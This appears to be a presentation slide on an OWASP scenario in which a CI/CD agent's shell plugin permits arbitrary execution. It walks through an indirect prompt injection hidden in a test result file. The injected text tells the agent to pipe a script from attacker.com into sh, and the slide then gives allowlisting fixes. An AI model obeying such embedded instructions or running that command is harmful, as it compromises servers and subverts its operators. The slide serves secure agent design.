Slide 16 · Scenario 3
The shell plugin that can execute anything.
OWASP’s third scenario — arbitrary execution instead of one restricted operation.
OWASP SCENARIO #3
Shell Command Plugin with Unrestricted Execution
A developer builds a CI/CD assistant that restarts a specific service when the agent detects a test failure. They integrate a shell-command plugin for the restart operation. Instead of registering only systemctl restart app-test, the plugin allows arbitrary shell execution. An indirect prompt injection — embedded in a test result file the agent reads — instructs it to run curl https://attacker.com/backdoor.sh | sh. The production server is compromised from inside the CI/CD pipeline.
Why it matters: The operation the agent legitimately needed (restart one service) required only one restricted command. The developer’s choice to allow arbitrary shell access turned a maintenance tool into a full RCE vector. CVE-2025-53773 is this exact scenario in production.
The Fix
If the agent needs to restart a service, give it exactly that command — allowlisted, with no shell interpolation. Use function-calling with explicit parameter validation. Treat “run any shell command” as an anti-pattern in agent design.